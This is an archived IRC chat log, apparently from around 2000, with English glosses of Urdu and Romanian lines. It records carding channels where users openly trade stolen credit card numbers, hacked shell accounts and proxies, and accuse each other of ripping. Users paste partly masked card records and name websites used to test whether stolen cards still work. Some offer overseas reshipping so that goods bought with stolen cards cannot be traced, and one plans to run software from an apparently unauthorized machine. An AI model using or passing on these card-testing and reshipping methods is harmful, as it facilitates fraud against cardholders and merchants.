      :D1ck! :modify style and idhar udhar so it doesnt look as we stole it
      @ modify the style and a bit here and there so it doesn't look as if we stole it

      :D1ck! :hehe
      :J4n3! :hah is say kuch nahi hotha waisy bee almost sub shells kay milthay julthay hain
      @ hah, that doesn't matter, almost all the shell sites are similar anyway

      :D1ck! :EMAIL HOSTING  
      :D1ck! :   FREE Domain Name Registration (Internic Fee applies) 
      :D1ck! :   username@your-company.com 
      :D1ck! :   5 Mailboxes (POP3) 
      :D1ck! :   25 Emails Forwarding 
      :D1ck! :  3 months [$30] - 6 months [$50] - 12 months [$75] 
      :D1ck! :lol
      :D1ck! :yup
      :D1ck! ::P
      :D1ck! :oye when will it be complete
      :D1ck! :asnd i am signing up legal domain
      :D1ck! :where should i?
      :D1ck! :cheapest
      :D1ck! :?
      :J4n3! :hmmm
      :D1ck! :mater may we are OC3 :P
      @ in the site content we are OC3

      :J4n3! :dotster.com
      :D1ck! :OC3 lines
      :D1ck! :ok
      :J4n3! :yeah from where u getting this server ? and till when u get it ?
      :J4n3! :it should be on redhat ok ?
      :D1ck! :easilyhosted
      :D1ck! :yep
      :D1ck! :it is
      :D1ck! :i`ll make it ultra secure
      :D1ck! :redhat 6.2
      :J4n3! :haha kewl 
      :D1ck! :i`ll upgrade to new kernel
      :J4n3! :give me 2 days for web
      :D1ck! :2.2.16
      :D1ck! :kewl
      :D1ck! :okies
      :J4n3! ::)
      :D1ck! :the day u do it
      :D1ck! :the next day ill get the seerver
      :D1ck! :online
      :J4n3! :hmmm
      :J4n3! :talked to ur dad bout it ?
      :D1ck! :ofcourse
      :D1ck! :he sed 'yes'
      :D1ck! :and i have his cc in my hand
      :D1ck! ::P
      :J4n3! :haha cool
      :J4n3! :woooo
      :J4n3! ::p
      :D1ck! ::/
      :J4n3! :lekin signup kahan say kiya ?? konsee company say ? 
      @ but where did you sign up? with which company?

      :J4n3! :t3 ?
      :J4n3! :or oc3 ?
      :D1ck! :well
      :D1ck! :more then Tota1KaaS1
      :D1ck! :t1
      :D1ck! :but
      :D1ck! :technically OC3
      :D1ck! :ll providers who sya they are oc3 are lieing, yes technicqally they
      :D1ck! :are
      :J4n3! :ahaan
      :D1ck! :but its shared bandwith
      :D1ck! :mine will be 990k/sec
      :J4n3! :w00ps
      :D1ck! :to 2 mb
      :D1ck! :and 40 gigs of transfer
      :J4n3! :shells will rock on this server
      :D1ck! :yep
      :D1ck! ::)
      :D1ck! :and i`ve heard routers are firewalled
      :D1ck! :so thats a good enws
      :J4n3! :great already signed up , or going to ?
      :D1ck! :oye pls get started on the page if u are not too bz
      :D1ck! ::P
      :D1ck! :i will send the payment
      :J4n3! :yeah i will from today
      :D1ck! :no cc
      :D1ck! :and today i`ll buy a merchant account
      :J4n3! :oh ohkay :)
      :D1ck! ::)
      :J4n3! :u have too many ips
      :D1ck! :yep
      :J4n3! :we can buy more domains illlegaly to like j0e but
      :D1ck! :that rox
      :D1ck! :well
      :D1ck! :i can get caught
      :J4n3! :first we need the dns of ur server so we can give it when registering the domain
      :D1ck! ::p
      :J4n3! :like ns1 and ns2
      :J4n3! :they need it for registeration
      :D1ck! :oh
      :D1ck! :i am half way through the registration
      :D1ck! :hehe
      :D1ck! :so i cant modify it later?
      :J4n3! :yeah :)
      :D1ck! :kewl
      :D1ck! :almost complete
      :J4n3! ::))))))
      :D1ck! :hehe
      :D1ck! :a graphix of Big Tecnologies would rock
      :J4n3! :sure it would , just see
      :D1ck! ::/
      :D1ck! :oki
      :J4n3! ::9:0:)
      :D1ck! ::)
      :J4n3! :how do i open a telnet on a box ?? from inetd.conf ? when it say connection refused on 23 , its not on hosts.allow
      :D1ck! :err they need name serfver
      :D1ck! :hehe
      :D1ck! :cat /etc/inetd.conf | grep telnet
      :D1ck! :and paste me here
      :J4n3! :yeah wait
      :J4n3! :hahah yeah
      :J4n3! :its close from there
      :J4n3! :the box is kewl i want to run psy from there
      :J4n3! :ip is admin.cgocable.net
      :J4n3! :wait lemme opne it
      :D1ck! :hehhe
      
      Romanian
      
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :D1ck! :Anyone have any "Gold-Line" Canadian Calling card #'s ??
      :m4r1n4ru! :Away
      :[4g3nt]! :anyone can tell how to use a company credit card ????
      :m4r1n4ru! :Away
      :TanTouze! :hi goober... oops wrong window
      :Ricky! :if someone would like to xchange cards contact me
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :damn it, im tired of all this shit
      :Co0lWoRx! :ok?
      :Ricky! :ii have 2 cards i will trade 
      :Ricky! :i dont go first
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards?
      :ABA! :Anyone want to trade cards?
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards? (msg me now)
      :AlfonsoD! :im trading too
      :ABA! :msg me AlfonsoD
      :AlfonsoD! :anyone trading?
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone trading cards?
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :[4g3nt]! :yo
      :[4g3nt]! :is a master card a 16 digit or 13 ?
      :ABA! :16
      :D4r1u55! :?
      :ABA! :xxxx/xxxx/xxxx/xxxx
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :D4r1u55! :wow
      :D4r1u55! :ABA
      :D4r1u55! :look here
      :D4r1u55! :[10:24] <D4r1u55> Not Approved: Customer information invalid. 
      :D4r1u55! :[10:24] <D4r1u55>      Not Approved: Invalid Credit Card Number. 
      :D4r1u55! :u give me 2 cc's.but are not viabils
      :D4r1u55! :[10:11] <ABA> <ABA> Dick xxxxxxx
      :D4r1u55! :[10:11] <ABA> <ABA> xxx St Example St
      :D4r1u55! :[10:11] <ABA> <ABA> Somewhere US
      :ABA! :I gave you two working CCs
      :ABA! :then
      :ABA! :you try to send me
      :ABA! :some bullshit
      :D4r1u55! :10:11] <ABA> <ABA> 10320
      :D4r1u55! :[10:11] <ABA> <ABA> 06/200x
      :D4r1u55! :[10:11] <ABA> <ABA> Mastercard.
      :D4r1u55! :[10:11] <ABA> <ABA> xxxx xxxx xxxx xxxx
      :D4r1u55! :[10:11] <ABA> .
      :ABA! :1.2meg html file
      :D4r1u55! :[10:11] <ABA> John Salvo
      :ABA! :fucking thief
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :D4r1u55! :[10:11] <ABA> 1175 Example Ave
      :D4r1u55! :[10:11] <ABA> 33146
      :D4r1u55! :[10:11] <ABA> VISA
      :D4r1u55! :10:11] <ABA> VISA
      :D4r1u55! :[10:11] <ABA> 12/200x
      :D4r1u55! :[10:11] <ABA> xxxxxxxxxxxxxxxx
      :D4r1u55! :and that's all
      :ABA! :you lame gimp
      :ABA! :youve got them the wrong way round
      :ABA! :thief
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :m4r1n4ru! :Away
      :D4r1u55! :that two cc's u send to me
      :D4r1u55! :and are'nt good
      :D4r1u55! :dont work
      :D4r1u55! :try to understand
      :D4r1u55! :whatever
      :[4g3nt]! :how can i card a company cc?
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :[4g3nt]! :hihi
      :[4g3nt]! :anyone can tell me how to use a company owned cc??
      :m4r1n4ru! :Away
      :Emy__! :I need some Cc `z (Visa)
      :Emy__! :...
      :ABA! :Anyone want to trade cards, msg me.
      :Emy__! :I need some credit cards .... Visa
      :ABA! :Emy MSG me then
      :m4r1n4ru! :Away
      :D4r1u55! :ACTION plek pa
      @ I'm leaving, bye

      :J4n3! :nettlink
      :ABA! :ANYONE want to trade cards?
      :Emy__! :I need some credit cards .... Visa
      :ABA! :Message me then you fucking idiot
      :ABA! :how many more times
      :m4r1n4ru! :Away
      :2red! :ACTION is selling virgin credit cards, /msg me for deal.
      :ABA! :ANYONE want to trade cards? Msg me
      :ABA! :ANYONE want to trade cards? Msg me
      :[4g3nt]! :fuck ABA <<< ripper 
      :[4g3nt]! :fuck ABA <<< ripper 
      :[4g3nt]! :fuck ABA <<< ripper 
      :Emy__! :I need some credit cards .... Visa
      :m4r1n4ru! :Away
      :ABA! :ANYONE want to trade cards? Msg me
      :ABA! :ANYONE want to trade cards? Msg me
      :m4r1n4ru! :Away
      :Emy__! :anybody want to give me a cc ??
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards?
      :sunfire! :
      :ABA! :Anyone want to trade cards?
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :connex! :anyone can help me to buy a shell?
      :m4r1n4ru! :Away
      :m4r1n4ru! :I have Returned.
      :m4r1n4ru! :-op
      :sunfire! : :-)
      :|DONNIE|! :ne1 have BNC...i have virgin..
      :|DONNIE|! :lets trade
      :DuXO! :hi to all
      :Razzorz! :anyone have bnc
      :Razzorz! :anyone have bnc?
      :Razzorz! :please tell me about bnc
      :DuKso! :hi anyone alive?
      :2red! :nope
      :DuKso! :how are u 2red :)
      :DuKso! :where are u from?
      :2red! :<- mortie/lita
      :DuKso! :hi man
      :DuKso! ::)
      :DuKso! :what are u doing:)
      :2red! :nothing
      :2red! :just listening to music
      :Nic[EQ]! :ACTION is trading Visas and MCs, looking for more or for shells
      :Emy__! :I need some cc `s (I do not have any )
      :FooDSt4mP! :anybody have any visa's?  i need to get a plane tick for a chick who's being abused by her husband
      :FooDSt4mP! :ill trade shells and dialup accounts for a visa/cc
      :[St0rM]! :hahahah
      :FooDSt4mP! :dude its not funny
      :FooDSt4mP! :its sad
      :FooDSt4mP! :i know it sounds like good bs for a card but its not..
      :MonTs! :what sort of shells?
      :FooDSt4mP! :aragorn.example.net
      :FooDSt4mP! :its a linux box.. rh 6.1... 6 bg's... 250 meg quota...
      :MonTs! :how many BG process?
      :FooDSt4mP! :redundant t3 conn
      :FooDSt4mP! :6 bg's
      :MonTs! :what's the http address?
      :FooDSt4mP! :no http.. its a private shell off a friends companies box
      :FooDSt4mP! :example.net is the isp
      :FooDSt4mP! :aragorn.example.net is the telnet addy
      :FooDSt4mP! :i just need some cc to get a damn ticket for this girl man
      :FooDSt4mP! :msg me if you wanna trade
      :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
      :2red! :pFFt--
      :Neon! :Have some cc...
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :2red! :we hear you
      :2red! :stop it
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :kurky! :I need someone to do me a favour....
      :kurky! :ull get a few virgin visa's
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :glipy! :bah
      @ hi!
      
      :glipy! :care-mi zice shi mie un site de un sa cumpar tembelfoane
      @ tell me a site where to buy "idiot-phones" (probably mobile phones)
      
      :glipy! :hap
      :glipy! :?
      :^W! :ACTION is trading ccz msg me for trade
      :wizz! :hey tabacu
      :TanTouze! :ok I'm here, now what were you saying?
      :NiCeBoY! :ello
      :NiCeBoY! :wers coolworx?
      :Mendoza! :hey . Ibill is  cardable?
      :DuXo! :hi to all
      :DuXo! :how are we today
      :NiCeBoY! :ello duxo
      :ABA! :Anyone want to trade cards? MSG me
      :DuXo! :npn msg me 
      :ABA! :Anyone want to trade cards? MSG me
      :NiCeBoY! :
      :DuXo! :any trade cc
      :ABA! :Anyone want to trade?
      :DuXo! :me :)
      :ABA! :heh
      :ABA! :again?
      :DuXo! ::))
      :DuXo! :yes but do u have with the phone number too?
      :lkd1! :i have
      :ABA! :no, just make one up innit :P
      :DuXo! :lkd1 :)
      :DuXo! :ripper:)
      :DuXo! :he just leave the channel :))
      :ABA! :ripper?
      :DuXo! ::)
      :ABA! :I just traded wif him :P
      :DuXo! :aND?
      :DuXo! ::)
      :DuXo! :he gaved u valid?
      :DuXo! :i haven`t trade..
      :ABA! :I verified
      :DuXo! :but he don`t wanted to trade with me .....
      :ABA! :before I gave him #
      :DuXo! :becasue he thinked...
      :DuXo! :im ripper 
      :2red! :duxo :P
      :DuXo! :with +v
      :ABA! :heh
      :ABA! :ive been ripped so many bloody times
      :ABA! :if they dont give me first
      :ABA! :I dont trade ever
      :DuXo! :ok....
      :ABA! :cos ive been ripped so many times
      :ABA! :about 10 times wif cards
      :ABA! :3 shells
      :ABA! :etc
      :2red! :tss
      :2red! :is that supposed to be something?
      :2red! :i got ripped off 40 virgins in one deal once
      :ABA! :40 virgins what?
      :2red! :40 virgin cards
      :ABA! :Drake``: Trade?
      :ABA! :ic
      :ABA! :and when some little foreign pissant lamer
      :ABA! :steals from you
      :Drake``! :trade what?
      :ABA! :then runs off
      :ABA! :Drake``: Cards
      :ABA! :it makes you wanna bloody cry
      :ABA! :and beat your comp
      :ABA! :innit
      :2red! :where are you from npn, romania?
      :ABA! :no uk
      :2red! :ok
      :2red! :sweden here
      :ABA! :england
      :2red! :interested in UK virgins?
      :ABA! :leet
      :ABA! :hmmm
      :ABA! :yup
      :2red! :i got plenty of international virgins
      :2red! :and US ofcourse
      :ABA! :quick tho
      :ABA! :cos i gtg real soon
      :2red! :err?
      :2red! :quick though what
      :ABA! :trade quick
      :ABA! :get on wif it
      :ABA! :cos i gtg
      :2red! :why would i trade virgins?
      :ABA! :no
      :ABA! :like i gib you summat else
      :2red! :hehe
      :2red! :i sell cards dear.
      :ABA! :oh dear
      :ABA! :so
      :ABA! :what do you want for it
      :2red! :money
      :ABA! :how much?
      :2red! :depends on how many you want
      :ABA! :10
      :2red! :100 dollars
      :ABA! :fuck me
      :2red! :?
      :ABA! :(please)
      :ABA! :i aint got 100$s
      :2red! :thats what it costs
      :2red! :thats how it is :)
      :hhkrgb! :romania anyone?
      :Bl4ck_! :yes
      :ABA! :0mg
      :ABA! :I dont fucking believe this
      :ABA! :that fool
      :ABA! :DuXo just ripped my card
      :ABA! :and ran
      :2red! :you surprised or something?
      :ABA! :erm
      :ABA! :yes
      :ABA! :hes an op
      :2red! :so?
      :ABA! :and ops dont do that kind of shit
      :ABA! :ive been trading here
      :ABA! :for about 
      :ABA! :6 months
      :ABA! :and no ops ever done that shit
      :2red! :thats interesting
      :2red! :cause i havent seen you areound much before
      :ABA! :Ive never seen you either
      :m4r1n4ru! :ABA can you send me a log man ?
      :2red! :my usual nick is mortie or lita
      :ABA! :m4r1n4ru yea, when I get back
      :ABA! :2red: ive seen the nick lita
      :ABA! :ages ago
      :m4r1n4ru! :ok send me log please
      :ABA! :I need dinner
      :t4b4cu! :huh
      :2red! :duxo
      :Piano2! :what?
      :t4b4cu! :so taht's lita
      :DuXo! :it`s me..
      :Bl4ck_! :t4b4cu?
      :2red! :im lita yeah
      :t4b4cu! :always changing nicks
      :t4b4cu! :hhe
      :DuXo! :i know..
      :Bl4ck_! ::>>
      :2red! :doesnt matter since i dont trade
      :2red! :i just watch you ppl
      :DuXo! :hm
      :2red! :and obviously an op just ripped?
      :DuXo! :npn
      :DuXo! :man
      :DuXo! :m4r1n4ru
      :DuXo! :i haven`t rip him up
      :2red! :what happened then?
      :DuXo! :man
      :DuXo! :he gaved me CCs
      :m4r1n4ru! :ya
      :m4r1n4ru! :what ?
      :DuXo! :2
      :DuXo! :and the both where invalid
      :DuXo! :we tradeed 340 minutes before
      :t4b4cu! :?
      :DuXo! :we tradeed 30 minutes before
      :DuXo! :he gaved me valid
      :t4b4cu! :who ripped?
      :DuXo! :and i gaved him valid CC
      :DuXo! :man
      :DuXo! :becuase i haved +v
      :t4b4cu! :who ripped?
      :t4b4cu! :i ban anyone who ripps
      :t4b4cu! :so ....i'd like to know
      :DuXo! :i checked the 2 ccs on www.come.to/tdnga
      :DuXo! :the first 2 sex banners..
      :DuXo! :i used the first one
      :DuXo! :and the CC comed out decliened
      :DuXo! :after that 
      :DuXo! :i checked the CC on www.bonzi.com
      :DuXo! :on Internet Boost
      :DuXo! :the first one come out and send me Invalid Card...
      :DuXo! :and another that the card is not valid anymore...
      :DuXo! :tabacu are u here??
      :2red! :oh well
      :2red! :you kids
      :2red! :i never understood the point of trading cards anyway
      :t4b4cu! :ahhahaah
      :t4b4cu! :looolz
      :t4b4cu! :us kids?
      :DuXo! :LoL
      :t4b4cu! :how old are u my dear?
      :2red! :im 20
      :2red! :why
      :DuXo! :so
      :t4b4cu! :lolz
      :DuXo! :what will happen?
      :t4b4cu! :i'm 20 too
      :DuXo! :u know that im a Legit one 
      :DuXo! :i can prove that man..
      :DuXo! :i have never ripped a man
      :t4b4cu! :most ppl areound here are about that age
      :2red! :i dont see anyone in here as legit
      :t4b4cu! :ahhah
      :t4b4cu! :what about me?
      :2red! :why would i see you as legit?
      :t4b4cu! :i have more ccs than anyone here
      :t4b4cu! :heh
      :2red! :and how many is that?
      :t4b4cu! :and i never ripped in my life
      :t4b4cu! :about 40.000
      :2red! :is it just me or could anyone say that?
      :t4b4cu! :anyway....i more hacker than carder
      :2red! :same here
      :t4b4cu! :that's why i could take this chan over
      :t4b4cu! :eheh
      :t4b4cu! :with my friends
      :hhkrgb! :join/romania
      :2red! :taking over a channel doesnt really require any skills.
      :hhkrgb! :wops
      :t4b4cu! :we flooded from oc48
      :t4b4cu! :heh
      :t4b4cu! :lolz
      :t4b4cu! :it does
      :2red! :packeting is for kids
      :t4b4cu! ::)
      :DuXo! :tabacu
      :DuXo! :is everthing ok now?
      :t4b4cu! :yeh it is
      :DuXo! :ok..
      :m4r1n4ru! :hhm
      :DuXo! :what?
      :m4r1n4ru! :so he ripped or not ?
      :DuXo! :no man..
      :DuXo! :i telled u i checked the cc
      :DuXo! :where is he 
      :DuXo! :i will talk with him
      :DuXo! :and check the CCs again
      :DuXo! :and give to the channel
      :m4r1n4ru! :ok
      :DuXo! :i don`t have the logs....
      :DuXo! :to prove right now..
      :hhkrgb
      :co^digigi! :hekss
      :co^digigi! :heks...
      :co^digigi! :i have a shell...and wanna trade with calling card
      :co^digigi! :serious person msg me 
      :DuXo! :cool
      :Co0lWoRx! :yo
      :DuXo! :let`s got to work
      :DuXo! :gety
      :DuXo! :get
      :DuXo! :and try that .
      :Co0lWoRx! :damn it
      :DuXo! :what the fuck is this :)
      :seriuscar! :what did you have in mind about tradi
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :Drake``! :co^digigi left after ripping me
      :Drake``! :hehehe
      :Co0lWoRx! :yo drake
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :MRuiCosta! :ACTION will trade virgin mc and visa for a shell acct that lets me dns host a .net site
      :taur! :salut
      @hello
      
      :taur! :astia tac si fac
      @this people are doing it silently (this is "they are efficient")
      
      :ows
      :ows
      :ows
      :MonTs! :howdy folks?
      :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
      :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
      :iDoetS! :gollllllllllllll
      :iDoetS! :1 more
      :MonTs! :1 more for whom?
      :iDoetS! :ceko
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :xKurko! :can anyone gimme one fast proxy???
      :m4r1n4ru! :-op
      :|AmDeAtH! :-op 
      :|AmDeAtH! :lol hehe
      :Reaggyman! :Do sombody now what the program ares do?
      :Reaggyman! :whats ares?
      :trinix! :sup all?
      :Reaggyman! :trinix: do you now what ares is
      :trinix! :any one got any tips for ordering stuff to yer own house with out getting caugfht?
      :trinix! :caught?
      :trinix! :no
      :trinix! :sultrix says u guys are the ones to ask
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :trinix! :nope
      :Reaggyman! :are you new here?
      :trinix! :yeah
      :Reaggyman! :me to
      :Reaggyman! :nowbody answers
      :trinix! :I am from uk
      :Reaggyman! :Norway
      :trinix! :I need help on how to order to my house with out getting caught
      :trinix! :using cc
      :Reaggyman! :What?
      :Reaggyman! :Order What?
      :trinix! :I wanna order stuff yeah but want to order straight to my house in the uk
      :Reaggyman! :isent that easy?
      :trinix! :hmm not sure
      :trinix! :I wanna an abandoned house but can't find any
      :Reaggyman! :I dont now
      :Reaggyman! :i came here to
      :Reaggyman! :i need a cracking program
      :trinix! :why dun you just go to www.xxxpassowrds.com
      :glipy! :what cracking program
      :Reaggyman! :i dont think they got THAT kind of passwords
      :Reaggyman! :The name is Ares
      :Reaggyman! :Hi sultrix
      :trinix! :heya man
      :Reaggyman! :i was band for xxxpasswords
      :Sultrix! :Hello
      :Sultrix! ::-(
      :Reaggyman! :Can you help me sultriz
      :Reaggyman! :x
      :Sultrix! :Can you guys help me i had a few working CC's but the dun work no more cxan anyone throw me few WORKING cc's my way please ?
      :Sultrix! :Reaggyman: Sure whatsup ?
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :MonTs! :Reaggyman ....try going to http://www.catfiles.net/adult.htm
      :Sultrix! :hmm
      :Sultrix! :no idea
      :Reaggyman! :Monts: whats that?
      :MonTs! :go there and have a look
      :Reaggyman! :and this is 
      :Reaggyman! :password?
      :Reaggyman! :Hi tauer
      :Tauer! :hi
      :Reaggyman! :can you help me?
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :astavista! :lol
      :trinix! :shit can anyone slide me some tips?
      :tauer! :mai 
      @ man
      
      :tauer! :asa ceva mai greu
      @ this is a little bit harder
      
      :trinix! :shit can anyone slide me some tips?
      :Reaggyman! :tauer what+
      :tauer! :dar poti s-a te duci la un site care da passworduri pt siteuri de genu asta
      @ but you can go to a site who gives passwords for sites like that
      
      :trinix! :wtf
      :tauer! :sau potzi s-a te inregistrezi cu un card
      @ or you can register yourself with a card
      
      :Reaggyman! :English plis
      :tauer! :lol
      :tauer! :u can go to a site thwt give u password
      :tauer! :sheet
      :tauer! :sorry
      :trinix! :wtf
      :tauer! :anibody spek romanian?
      :trinix! :shit can anyone give me some tips?
      :tauer! :what kind of tips?
      :tauer! :trinix?
      :Sultrix! :in credit card fraud he means
      :tauer! :lol
      :tauer! :what i am thinking....:)
      :Sultrix! :heh
      :tauer! :the chanel carding
      :trinix! :I wanna send some stuff to my house in the uk, any tips on how to not get caught?
      :tauer! :is hard to someone to teel u about theat
      :tauer! :in uk?
      :tauer! :is verry hard
      :trinix! :what?
      :tauer! :but u can sendit to me in other country
      :trinix! :is hard to someone to teel u about theat <------------ what?
      :tauer! :and i can sendit to u
      :trinix! :nah
      :tauer! :about:I wanna send some stuff to my house in the uk, any tips on how to not get caught?
      :xKurko! :I offered that and Im in the UK with a different drop than my house
      :trinix! :I have cc of people in USA and wanna buy stuff in the UK and send it to me in my house
      :tauer! :i dont write to well in enghlish
      :trinix! :any tips?
      :tauer! :u can sendit to me in romania and i sendit to u after the pocket arieve to me
      :tauer! ::)
      :trinix! :nah take to long
      :tauer! :lol
      :tauer! :is my turn?
      :trinix! :besides you might keep it
      :tauer! :to ping time out?
      :tauer! :food weaponds?
      :tauer! :flood
      :trinix! :wb bro
      :Sultrix! :ta 
      :Sultrix! :wassup bra
      :trinix! :nadda
      :trinix! :reading up on some shit
      :Sultrix! :cool
      :Sultrix! :Has anyone here got any WORKING CC numbers ?
      :tauer! :i sell vodoo 3 3000 100$
      :tauer! :whith id
      :tauer! ::)
      :damang! :need some fresh cc
      :Sultrix! :me too
      :YesIAm! :haha
      :trinix! :me too
      :Sultrix! :Anyone got any cc numbers that work
      :trinix! :answer him god damn it
      :YesIAm! :my cc number works 
      :fus10nx! :nope...
      :YesIAm! ::)
      :CC-Master! :who trade here?
      :fus10nx! :not U
      :fus10nx! :Not I
      :trinix! :fus10nx yeah....
      :CC-Master! :?
      :CC-Master! :so 
      :CC-Master! :anyone for trade round here?
      :damang! :shells for fresh cc
      :CC-Master! :what shels or ccz?
      :damang! :i have shelz
      :Sultrix! :Does anyone have any CC's ??
      :CC-Master! :ye
      :CC-Master! :i have 
      :CC-Master! :so?
      :Sultrix! :that i can have
      :YesIAm! :hahaahaha
      :Sultrix! :ffs
      :damang! :need some fresh cc
      :Sultrix! :Can nayone dish some ccs my wya pease
      :YesIAm! :If somebody wanted to donate a # he would paste it into the chan
      :damang! :i have shelz wana trade w/ cc
      :BONI! :hi anyone for trade?
      :YesIAm! :<CC-Master> anyone for trade round here?
      :BONI! :?
      :BONI! :so>?
      :rgers! :hi boni
      :rgers! :how are u?
      :rgers! ::))
      :Nic[AwaY]! :ACTION have a lot of ccs ( Mastercards and Visas ) trading for more or eggdroppable shells
      :Papa-tudo! :anyone trade bncs with vhosts?
      :Papa-tudo! :ACTION trading bncs with vhosts
      :Papa-tudo! :ACTION trading bncs with vhosts
      :Papa-tudo! :ACTION trading bncs with vhosts
      :ureche! :re
      :_Mephisto! :re
      :_Mephisto! :cine pizda masii a pus topicul ala idiot?
      @ who the fuck set that stupid topic?
      
      :SIZIF! :enybody have cc?
      :Bl4ck_! :t4b4cu
      :ucok! :hai
      :Bl4ck_! :salut
      @ hello
      
      :ucok! :
      :ucok! :xeexxexeexxeeeexe
      :t4b4cu! :salut
      @ hello
      
      :dlotos33! :is there anyone from MACEDONIA?
      :SIZIF! :yep
      :blazo99! :what's the problem duds
      :FanTom! :some one wots to trade
      :GoDsHaNd! :can someone help me?
      :blazo99! :what's the problem
      :GoDsHaNd! :blazo99
      :GoDsHaNd! :ej
      :GoDsHaNd
      :Pinu\away! :hi
      :t4b4cu! :c
      :Clasher! :Sorry to bother, but, does anyone have a spare card?
      :Co0lWoRx! :
      :Bl4ck_! :m4r1n4ru
      :Bl4ck_! :m4r1n4ru
      :Bl4ck_! :m4r1n4ru
      :m4r1n4ru! :marca ma
      @ (???)
      
      :Co0lWoRx! :7me any1 here wanna earn +v, msg me now
      :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
      :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
      :Bl4ck_! :de ce am ban pe #rocarding?
      @ why am I banned on #rocarding?
      
      :Bl4ck_! :Co0lWoRx :PP
      :m4r1n4ru! :?
      :Co0lWoRx! :?
      :Co0lWoRx! :?
      :Co0lWoRx! :???
      :Bl4ck_! :Co0lWoRx I used to have +v in here
      :Bl4ck_! ::>>
      :Co0lWoRx! :well, y u loose it?
      :Bl4ck_! :dunno
      :Bl4ck_! :never minds
      :Bl4ck_! ::>>
      :SIZIF! :enybody have cc?
      :Co0lWoRx! :look at this shit ppl
      :Co0lWoRx! :<SIZIF> do u have cc's?
      :Co0lWoRx! :<Co0lWoRx> hmmm, yes, a lot
      :Co0lWoRx! :<SIZIF> would u like to send me just one?
      :Co0lWoRx! :<Co0lWoRx> hahahaha, go away pls lamer
      :SIZIF! :enybody have cc?
      :Co0lWoRx! :ure banned man, bye
      :SIZIF! :IZIF> <SIZIF> succker <Co0lWoRx
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :Co0lWoRx! :ok ok
      :yourlife! :k
      :Co0lWoRx! :w8
      :GoDsHaNd! :no i'm not
      :_Mephisto! :he is right
      :GoDsHaNd! :he want to gave CC which doesn't work
      :GoDsHaNd! :i sad to him to gave me to check fhirst
      :GoDsHaNd! :i'm not RIPPER
      :yourlife! :proove it ,,,
      :GoDsHaNd! :how?
      :_Mephisto! :give to all a good card
      :GoDsHaNd! :ahahahahahahahaa
      :GoDsHaNd! :you r crazy
      :DuXo! :hi too all
      :DuXo! :how are we today
      :yourlife! :who win football ? danmark or holland ? 
      :Co0lWoRx! :holland
      :DuXo! :Holland :)
      :DuXo! :3:0
      :_Mephisto! :3-0
      :_Mephisto! :hey what do you think of romania?
      :DuXo! :has been storm around?
      :Co0lWoRx! :nope
      :yourlife! :tomorrow will be a great match 
      :DuXo! :yes
      :yourlife! :Ger-Eng
      :DuXo! :Germany  - England
      :DuXo! :..
      :yourlife! :very big battle 
      :DuXo! :anyone here from Europe and wanna Chat ???
      :Co0lWoRx! :me...
      :DuXo! ::))
      :DuXo! :i already know u cool:)
      :DuXo! :anyone see Playboy?
      :Co0lWoRx! :hmmmmmmm, ok
      :Co0lWoRx! :i want playboy
      :DuXo! ::)
      :DuXo! :LoL
      :Co0lWoRx! :yo duxo, go card a membership at www.playboy.com
      :DuXo! :why?
      :DuXo! ::))
      :Co0lWoRx! :so we can use it, go pls
      :Co0lWoRx! :for me....
      :Clasher! :Sorry to bother, but, does anyone have a spare card?
      :Co0lWoRx! :=o)
      :DuXo! ::)
